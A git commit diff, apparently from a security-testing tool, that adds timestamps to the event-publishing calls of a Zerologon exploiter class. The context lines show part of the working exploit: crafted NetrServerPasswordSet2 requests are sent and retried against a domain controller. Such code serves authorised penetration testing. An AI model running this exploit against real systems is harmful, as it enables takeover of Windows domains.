Agent: Add timestamps to publish calls

Kekoa Kaaikala 2022-10-07 20:27:14 +00:00
parent 8eb3c94a94
commit 88d2bf7140
1 changed files with 14 additions and 17 deletions


@ -187,19 +187,20 @@ class ZerologonExploiter(HostExploiter):
def _send_exploit_rpc_login_requests(self, rpc_con) -> bool: def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt): for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
exploit_attempt_result = self.try_exploit_attempt(rpc_con) exploit_attempt_result, timestamp = self.try_exploit_attempt(rpc_con)
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result) is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result, timestamp)
if is_exploited: if is_exploited:
return True return True
return False return False
def try_exploit_attempt(self, rpc_con) -> Optional[object]: def try_exploit_attempt(self, rpc_con) -> Tuple[Optional[object], float]:
error_message = "" error_message = ""
timestamp = time()
try: try:
exploit_attempt_result = self.attempt_exploit(rpc_con) exploit_attempt_result = self.attempt_exploit(rpc_con)
return exploit_attempt_result return exploit_attempt_result, timestamp
except nrpc.DCERPCSessionError as err: except nrpc.DCERPCSessionError as err:
# Failure should be due to a STATUS_ACCESS_DENIED error. # Failure should be due to a STATUS_ACCESS_DENIED error.
# Otherwise, the attack is probably not working. # Otherwise, the attack is probably not working.
@ -210,12 +211,9 @@ class ZerologonExploiter(HostExploiter):
error_message = f"Unexpected error: {err}" error_message = f"Unexpected error: {err}"
logger.info(error_message) logger.info(error_message)
self._publish_exploitation_event( self._publish_exploitation_event(timestamp, False, error_message=error_message)
success=False,
error_message=error_message,
)
return None return None, timestamp
def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object: def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object:
request = nrpc.NetrServerPasswordSet2() request = nrpc.NetrServerPasswordSet2()
@ -236,25 +234,24 @@ class ZerologonExploiter(HostExploiter):
request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
request["Authenticator"] = authenticator request["Authenticator"] = authenticator
def assess_exploit_attempt_result(self, exploit_attempt_result) -> bool: def assess_exploit_attempt_result(self, exploit_attempt_result, timestamp: float) -> bool:
if exploit_attempt_result: if exploit_attempt_result:
if exploit_attempt_result["ErrorCode"] == 0: if exploit_attempt_result["ErrorCode"] == 0:
self.report_login_attempt(result=True, user=self.dc_name) self.report_login_attempt(result=True, user=self.dc_name)
_exploited = True _exploited = True
logger.info("Exploit complete!") logger.info("Exploit complete!")
self._publish_exploitation_event(success=True) self._publish_exploitation_event(timestamp, True)
else: else:
self.report_login_attempt(result=False, user=self.dc_name) self.report_login_attempt(result=False, user=self.dc_name)
_exploited = False _exploited = False
error_message = f"Non-zero return code: {exploit_attempt_result['ErrorCode']}." error_message = (
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
"Something went wrong." "Something went wrong."
)
logger.info(error_message) logger.info(error_message)
self._publish_exploitation_event( self._publish_exploitation_event(timestamp, False, error_message=error_message)
success=False,
error_message=error_message,
)
return _exploited return _exploited
return False return False